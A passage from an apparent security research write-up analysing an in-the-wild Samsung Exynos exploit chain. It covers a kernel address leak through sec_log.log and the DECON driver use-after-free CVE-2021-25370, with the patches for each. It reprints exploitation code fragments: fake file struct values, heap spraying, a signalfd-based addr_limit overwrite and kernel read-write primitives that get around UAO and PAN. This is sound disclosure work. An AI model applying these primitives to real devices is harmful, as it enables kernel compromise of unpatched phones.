\"/data/log/sec_log.log\"); \n \n--- \n \nAfter starting the bugreport service, the exploit uses [inotify](<https://man7.org/linux/man-pages/man7/inotify.7.html>) to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.\n\nAn example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.\n\n<4>[90808.635627] [4: poc:25943] ------------[ cut here ]------------\n\n<4>[90808.635654] [4: poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664\n\n<4>[90808.635663] [4: poc:25943] Modules linked in:\n\n<4>[90808.635675] [4: poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G W 4.14.113-20034833 #1\n\n<4>[90808.635682] [4: poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)\n\n<4>[90808.635689] [4: poc:25943] Call trace:\n\n<4>[90808.635701] [4: poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280\n\n<4>[90808.635710] [4: poc:25943] [<0000000000000000>] show_stack+0x18/0x24\n\n<4>[90808.635720] [4: poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4\n\n<4>[90808.635731] [4: poc:25943] [<0000000000000000>] __warn+0xbc/0x164tv\n\n<4>[90808.635738] [4: poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c\n\n<4>[90808.635746] [4: poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c\n\n<4>[90808.635753] [4: poc:25943] [<0000000000000000>] brk_handler+0x94/0x150\n\n<4>[90808.635760] [4: poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164\n\n<4>[90808.635766] [4: poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)\n\n<4>[90808.635775] [4: poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000\n\n<4>[90808.635781] [4: poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a\n\n<4>[90808.635789] [4: poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b\n\n<4>[90808.635796] [4: poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026\n\n<4>[90808.635802] [4: poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000\n\n<4>[90808.635809] [4: poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004\n\n<4>[90808.635816] [4: poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000\n\n<4>[90808.635823] [4: poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80\n\n<4>[90808.635829] [4: poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008\n\n<4>[90808.635836] [4: poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c\n\n<4>[90808.635843] [4: poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74 \n \n--- \n \nThe file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.\n\n$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app\n\nallow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };\n\nallow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };\n\nallow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };\n\nallow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };\n\nallow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };\n\nallow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };\n\nallow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read }; \n \n--- \n \n## Fixing the vulnerability\n\nThere were a few different changes to address this vulnerability:\n\n * Modified the dumpstate binary on the device \u2013 As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.\n * Removed the bugreport service from dumpstate.rc.\n\nIn addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:\n\n * As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.\n * In April 2020, [upstream Linux made a change](<https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/arch/arm64/kernel/traps.c?h=linux-4.14.y&id=6dc0256f802be6bc783fb9542affb48d267f592c>) to no longer include raw stack contents in kernel backtraces.\n\n# Vulnerability #3 - Arbitrary kernel read and write\n\nThe final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the [upstream commit message](<https://patchwork.kernel.org/project/dri-devel/patch/1417097460-18403-1-git-send-email-ajaykumar.rs@samsung.com/>), DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access. \n\n[![Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19925 \$CVE-2021-25370\$: Memory corruption in dpu driver \u00a0Severity: Moderate Affected versions: O\$8.x\$, P\$9.0\$, Q\$10.0\$, R\$11.0\$ devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDPl73oa-7g4YO-V5owrIWmBkxynQqdOD4lgWyubSEx7dg2BoS502R_3o4QZjFfP3gjwoEVNv7__hYBltjZuj5aIq22wdDPg8klVTrahHcwp-TxgHoOkeIerXdOUh2igwrLtPYFBlDqEJdaccmMuV88suhYn9v07QfM3b2NlHZ0zNCux84B4RojB-U/s1200/image1.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDPl73oa-7g4YO-V5owrIWmBkxynQqdOD4lgWyubSEx7dg2BoS502R_3o4QZjFfP3gjwoEVNv7__hYBltjZuj5aIq22wdDPg8klVTrahHcwp-TxgHoOkeIerXdOUh2igwrLtPYFBlDqEJdaccmMuV88suhYn9v07QfM3b2NlHZ0zNCux84B4RojB-U/s1213/image1.png>)\n\n## Find the PID of android.hardware.graphics.composer\n\nTo be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process. \n\nThe exploit connects to [LogReader which listens at](<https://cs.android.com/android/platform/superproject/+/586af4e17de6b8bf665dc2a1bb61f46fddb326f7:system/logging/logd/main.cpp;l=256>) /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:\n\nstream lids=0,3,4 \n \n--- \n \nThe exploit then monitors the log contents until it sees the words \u2018display\u2019 or \u2018SDM\u2019. Once it finds a \u2018display\u2019 or \u2018SDM\u2019 log entry, the exploit then reads the PID from that log entry.\n\nNow it has the PID of android.hardware.graphics.composer, where [android.hardware.graphics composer is the Hardware Composer HAL](<https://source.android.com/docs/core/graphics/hwc>).\n\nNext the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains \u201cgraphics/fb0\u201d, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path. \n\n## Triggering the Use-After-Free\n\nThe vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A \u201c[fence](<https://www.kernel.org/doc/html/latest/driver-api/sync_file.html>)\u201d is used for sharing buffers and synchronizing access between drivers and different processes. \n\n/**\n\n* struct sync_file - sync file to export to the userspace\n\n* @file: file representing this fence\n\n* @sync_file_list: membership in global file list\n\n* @wq: wait queue for fence signaling\n\n* @fence: fence with the fences in the sync_file\n\n* @cb: fence callback information\n\n*/\n\nstruct sync_file {\n\nstruct file *file;\n\n/**\n\n* @user_name:\n\n*\n\n* Name of the sync file provided by userspace, for merged fences.\n\n* Otherwise generated through driver callbacks (in which case the\n\n* entire array is 0).\n\n*/\n\nchar user_name[32];\n\n#ifdef CONFIG_DEBUG_FS\n\nstruct list_head sync_file_list;\n\n#endif\n\nwait_queue_head_t wq;\n\nunsigned long flags;\n\nstruct dma_fence *fence;\n\nstruct dma_fence_cb cb;\n\n}; \n \n--- \n \nThe driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.\n\nstatic int decon_set_win_config(struct decon_device *decon,\n\nstruct decon_win_config_data *win_data)\n\n{\n\nint num_of_window = 0;\n\nstruct decon_reg_data *regs;\n\nstruct sync_file *sync_file;\n\nint i, j, ret = 0;\n\n[...]\n\nnum_of_window = decon_get_active_win_count(decon, win_data);\n\nif (num_of_window) {\n\nwin_data->retire_fence = decon_create_fence(decon, &sync_file);\n\nif (win_data->retire_fence < 0)\n\ngoto err_prepare;\n\n} else {\n\n[...]\n\nif (num_of_window) {\n\nfd_install(win_data->retire_fence, sync_file->file);\n\ndecon_create_release_fences(decon, win_data, sync_file);\n\n#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)\n\nregs->retire_fence = dma_fence_get(sync_file->fence);\n\n#endif\n\n}\n\n[...]\n\nreturn ret;\n\n} \n \n--- \n \nIn this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.\n\nint decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)\n\n{\n\nstruct dma_fence *fence;\n\nint fd = -EMFILE;\n\nfence = kzalloc(sizeof(*fence), GFP_KERNEL);\n\nif (!fence)\n\nreturn -ENOMEM;\n\ndma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,\n\ndecon->fence.context,\n\natomic_inc_return(&decon->fence.timeline));\n\n*sync_file = sync_file_create(fence);\n\ndma_fence_put(fence);\n\nif (!(*sync_file)) {\n\ndecon_err(\"%s: failed to create sync file\\n\", __func__);\n\nreturn -ENOMEM;\n\n}\n\nfd = decon_get_valid_fd();\n\nif (fd < 0) {\n\ndecon_err(\"%s: failed to get unused fd\\n\", __func__);\n\nfput((*sync_file)->file);\n\n}\n\nreturn fd;\n\n} \n \n--- \n \nThe function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct.\n\nvoid decon_create_release_fences(struct decon_device *decon,\n\nstruct decon_win_config_data *win_data,\n\nstruct sync_file *sync_file)\n\n{\n\nint i = 0;\n\nfor (i = 0; i < decon->dt.max_win; i++) {\n\nint state = win_data->config[i].state;\n\nint rel_fence = -1;\n\nif (state == DECON_WIN_STATE_BUFFER) {\n\nrel_fence = decon_get_valid_fd();\n\nif (rel_fence < 0) {\n\ndecon_err(\"%s: failed to get unused fd\\n\",\n\n__func__);\n\ngoto err;\n\n}\n\nfd_install(rel_fence, get_file(sync_file->file));\n\n}\n\nwin_data->config[i].rel_fence = rel_fence;\n\n}\n\nreturn;\n\nerr:\n\nwhile (i\\-- > 0) {\n\nif (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {\n\nput_unused_fd(win_data->config[i].rel_fence);\n\nwin_data->config[i].rel_fence = -1;\n\n}\n\n}\n\nreturn;\n\n} \n \n--- \n \ndecon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.\n\nWhen decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.\n\n### Fixing the vulnerability\n\nSamsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.\n\nif (num_of_window) {\n\n- fd_install(win_data->retire_fence, sync_file->file);\n\ndecon_create_release_fences(decon, win_data, sync_file);\n\n#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)\n\nregs->retire_fence = dma_fence_get(sync_file->fence);\n\n#endif\n\n}\n\ndecon_hiber_block(decon);\n\nmutex_lock(&decon->up.lock);\n\nlist_add_tail(&regs->list, &decon->up.list);\n\n+ atomic_inc(&decon->up.remaining_frame);\n\ndecon->update_regs_list_cnt++;\n\n+ win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);\n\nmutex_unlock(&decon->up.lock);\n\nkthread_queue_work(&decon->up.worker, &decon->up.work);\n\n+ /*\n\n\\+ * The code is moved here because the DPU driver may get a wrong fd\n\n\\+ * through the released file pointer,\n\n\\+ * if the user(HWC) closes the fd and releases the file pointer.\n\n\\+ *\n\n\\+ * Since the user land can use fd from this point/time,\n\n\\+ * it can be guaranteed to use an unreleased file pointer\n\n\\+ * when creating a rel_fence in decon_create_release_fences(...)\n\n\\+ */\n\n+ if (num_of_window)\n\n+ fd_install(win_data->retire_fence, sync_file->file);\n\nmutex_unlock(&decon->lock); \n \n--- \n \n## Heap Grooming and Spray\n\nTo groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:\n\nfake_file.f_u = 0x1010101;\n\nfake_file.f_op = kaddr - 0x2071B0+0x1094E80;\n\nfake_file.f_count = 0x7F;\n\nfake_file.private_data = addr_limit_ptr; \n \n--- \n \nThe f_op member is set to the signalfd_op for reasons we will cover below in the \u201cOverwriting the addr_limit\u201d section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.\n\nThe exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver. \n\n/**\n\n* struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel\n\n* @buffer: Pointer to the information\n\n* @len: Length\n\n* @padding: Padding\n\n*\n\n* The data provided is accessible through a debugfs file\n\n*/\n\nstruct kbase_ioctl_mem_profile_add {\n\n__u64 buffer;\n\n__u32 len;\n\n__u32 padding;\n\n};\n\n#define KBASE_ioctl_MEM_PROFILE_ADD \\\n\n_IOW(KBASE_ioctl_TYPE, 27, struct kbase_ioctl_mem_profile_add)\n\nstatic int kbase_api_mem_profile_add(struct kbase_context *kctx,\n\nstruct kbase_ioctl_mem_profile_add *data)\n\n{\n\nchar *buf;\n\nint err;\n\nif (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {\n\ndev_err(kctx->kbdev->dev, \"mem_profile_add: buffer too big\\n\");\n\nreturn -EINVAL;\n\n}\n\nbuf = kmalloc(data->len, GFP_KERNEL);\n\nif (ZERO_OR_NULL_PTR(buf))\n\nreturn -ENOMEM;\n\nerr = copy_from_user(buf, u64_to_user_ptr(data->buffer),\n\ndata->len);\n\nif (err) {\n\nkfree(buf);\n\nreturn -EFAULT;\n\n}\n\nreturn kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);\n\n} \n \n--- \n \nThis ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.\n\nFinally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.\n\n[![Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs. \u00a0The highlighted text reads: "Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices"](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYOnatV5Tbxu0n0Q5oP5HGHvZowemJC_GKvaFf-FAuwlNfx-m5AxwqWU0g5oMMejAoIUcCi10u7pE3n_uuhT3mmfE-7e74_B-ZifuKTmF44asidpw34Gg0jFNAMVKa2i9MsZ6MSGJrN2RayBa3kiPTBc-9JSqhk42W-wjV-IEAYhaQUiZ1hwiVmBpB/s903/image4.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYOnatV5Tbxu0n0Q5oP5HGHvZowemJC_GKvaFf-FAuwlNfx-m5AxwqWU0g5oMMejAoIUcCi10u7pE3n_uuhT3mmfE-7e74_B-ZifuKTmF44asidpw34Gg0jFNAMVKa2i9MsZ6MSGJrN2RayBa3kiPTBc-9JSqhk42W-wjV-IEAYhaQUiZ1hwiVmBpB/s903/image4.png>)\n\nFor example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted. \n\na51:/ $ getprop ro.build.fingerprint\n\nsamsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys\n\na51:/ $ getprop ro.build.version.security_patch\n\n2021-02-01\n\na51:/ $ uname -a\n\nLinux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64\n\na51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS \n\nCONFIG_DEBUG_FS=y\n\na51:/ $ cat /proc/mounts | grep debug \n\n/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0 \n \n--- \n \nBecause DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn\u2019t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.\n\n#ifdef CONFIG_DEBUG_FS\n\nint kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,\n\nsize_t size)\n\n{\n\nint err = 0;\n\nmutex_lock(&kctx->mem_profile_lock);\n\ndev_dbg(kctx->kbdev->dev, \"initialised: %d\",\n\nkbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));\n\nif (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {\n\nif (IS_ERR_OR_NULL(kctx->kctx_dentry)) {\n\nerr = -ENOMEM;\n\n} else if (!debugfs_create_file(\"mem_profile\", 0444,\n\nkctx->kctx_dentry, kctx,\n\n&kbasep_mem_profile_debugfs_fops)) {\n\nerr = -EAGAIN;\n\n} else {\n\nkbase_ctx_flag_set(kctx,\n\nKCTX_MEM_PROFILE_INITIALIZED);\n\n}\n\n}\n\nif (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {\n\nkfree(kctx->mem_profile_data);\n\nkctx->mem_profile_data = data;\n\nkctx->mem_profile_size = size;\n\n} else {\n\nkfree(data);\n\n}\n\ndev_dbg(kctx->kbdev->dev, \"returning: %d, initialised: %d\",\n\nerr, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));\n\nmutex_unlock(&kctx->mem_profile_lock);\n\nreturn err;\n\n}\n\n#else /* CONFIG_DEBUG_FS */\n\nint kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,\n\nsize_t size)\n\n{\n\nkfree(data);\n\nreturn 0;\n\n}\n\n#endif /* CONFIG_DEBUG_FS */ \n \n--- \n \nBy writing the fake file structs as a singular 0x2000 size buffer rather than as 25 individual 0x140 size buffers, the exploit will be writing their fake structs to two whole pages which increases the odds of reallocating over the freed file struct.\n\nThe exploit then calls dup2 on the dangling FD\u2019s. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that they successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.\n\nTo determine if any of the file struct\u2019s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory\u2019s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.\n\n## Overwriting the addr_limit\n\nLike many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it\u2019s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF. \n\nUserspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.\n\nsignalfd(dangling_fd, 0xFFFFFF8000000000, 8); \n \n--- \n \nAccording to the [man pages](<https://man7.org/linux/man-pages/man2/signalfd.2.html>), the syscall signalfd is:\n\nsignalfd() creates a file descriptor that can be used to accept signals targeted at the caller. This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).\n\nint signalfd(int fd, const sigset_t *mask, int flags); \n \n--- \n \nThe exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the signmask of the signalfd_ctx struct.. \n\ntypedef unsigned long sigset_t;\n\nstruct signalfd_ctx {\n\nsigset_t sigmask;\n\n}; \n \n--- \n \nThe file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.\n\nLet\u2019s walk through how the signalfd source code updates the mask: \n\nSYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,\n\nsize_t, sizemask, int, flags)\n\n{\n\nsigset_t sigmask;\n\nstruct signalfd_ctx *ctx;\n\n/* Check the SFD_* constants for consistency. */\n\nBUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);\n\nBUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);\n\nif (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))\n\nreturn -EINVAL;\n\nif (sizemask != sizeof(sigset_t) ||\n\ncopy_from_user(&sigmask, user_mask, sizeof(sigmask)))\n\nreturn -EINVAL;\n\nsigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));\n\nsignotset(&sigmask); // [1]\n\nif (ufd == -1) { // [2]\n\nctx = kmalloc(sizeof(*ctx), GFP_KERNEL);\n\nif (!ctx)\n\nreturn -ENOMEM;\n\nctx->sigmask = sigmask;\n\n/*\n\n* When we call this, the initialization must be complete, since\n\n* anon_inode_getfd() will install the fd.\n\n*/\n\nufd = anon_inode_getfd(\"[signalfd]\", &signalfd_fops, ctx,\n\nO_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));\n\nif (ufd < 0)\n\nkfree(ctx);\n\n} else { // [3]\n\nstruct fd f = fdget(ufd);\n\nif (!f.file)\n\nreturn -EBADF;\n\nctx = f.file->private_data; // [4]\n\nif (f.file->f_op != &signalfd_fops) { // [5]\n\nfdput(f);\n\nreturn -EINVAL;\n\n}\n\nspin_lock_irq(&current->sighand->siglock);\n\nctx->sigmask = sigmask; // [6] WRITE!\n\nspin_unlock_irq(&current->sighand->siglock);\n\nwake_up(&current->sighand->signalfd_wqh);\n\nfdput(f);\n\n}\n\nreturn ufd;\n\n} \n \n--- \n \nFirst the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] makes this change. The call to sigdelsetmask ensures that the SIG_KILL and SIG_STOP signals are always blocked so it clears bit 8 (SIG_KILL) and bit 18 (SIG_STOP) in order for them to be set in the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF). \n\nThe function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit\u2019s case it\u2019s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer. \n\nThe signalfd manual page also says that the fd argument \u201c[must specify a valid existing signalfd file descriptor](<https://man7.org/linux/man-pages/man2/signalfd.2.html#:~:text=If%20fd%20is%20not%20%2D1%2C%20then%20it%20must%20specify%20a%0A%20%20%20%20%20%20%20valid%20existing%20signalfd%20file%20descriptor>)\u201d. To verify this, at [5] the syscall checks if the underlying file\u2019s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit\u2019s case, the fake file struct\u2019s private_data was set to the addr_limit pointer. So when the mask is written, we\u2019re actually overwriting the addr_limit.\n\nThe exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFCFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We\u2019ll talk about why they\u2019re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section. \n\n## Working Around UAO and PAN\n\n\u201cUser-Access Override\u201d (UAO) and \u201cPrivileged Access Never\u201d (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.\n\nIt\u2019s often said that the addr_limit overwrite technique detailed above doesn\u2019t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our [proof-of-concept for CVE-2019-2215](<https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414885#176>) back in 2019. Our kernel_write function is shown below.\n\nvoid kernel_write(unsigned long kaddr, void *buf, unsigned long len) {\n\nerrno = 0;\n\nif (len > 0x1000) errx(1, \"kernel writes over PAGE_SIZE are messy, tried 0x%lx\", len);\n\nif (write(kernel_rw_pipe[1], buf, len) != len) err(1, \"kernel_write failed to load userspace buffer\");\n\nif (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, \"kernel_write failed to overwrite kernel memory\");\n\n} \n \n--- \n \nThis technique works by first writing the pointer to the buffer of the contents that you\u2019d like written to one end of the pipe. By then calling a read and passing in the kernel address you\u2019d like to write to, those contents are then written to that kernel memory address.\n\nWith UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.\n\nLet\u2019s say we didn\u2019t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that\u2019s not KERNEL_DS. PAN wouldn\u2019t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.\n\nThe way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it does not.\n\n/* Restore the UAO state depending on next's addr_limit */\n\nvoid uao_thread_switch(struct task_struct *next)\n\n{\n\nif (IS_ENABLED(CONFIG_ARM64_UAO)) {\n\nif (task_thread_info(next)->addr_limit == KERNEL_DS)\n\nasm(ALTERNATIVE(\"nop\", SET_PSTATE_UAO(1), ARM64_HAS_UAO));\n\nelse\n\nasm(ALTERNATIVE(\"nop\", SET_PSTATE_UAO(0), ARM64_HAS_UAO));\n\n}\n\n} \n \n--- \n \nThe exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit\u2019s function to write to kernel addresses is shown below:\n\nkernel_write(void *kaddr, const void *buf, unsigned long buf_len)\n\n{\n\nunsigned long USER_DS = 0x7FFFFFFFFF;\n\nwrite(kernel_rw_pipe2, buf, buf_len); // [1]\n\nwrite(kernel_rw_pipe2, &USER_DS, 8u); // [2]\n\nset_addr_limit_to_KERNEL_DS(); // [3] \n\nread(kernel_rw_pipe, kaddr, buf_len); // [4]\n\nread(kernel_rw_pipe, addr_limit_ptr, 8u); // [5]\n\n} \n \n--- \n \nThe function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the 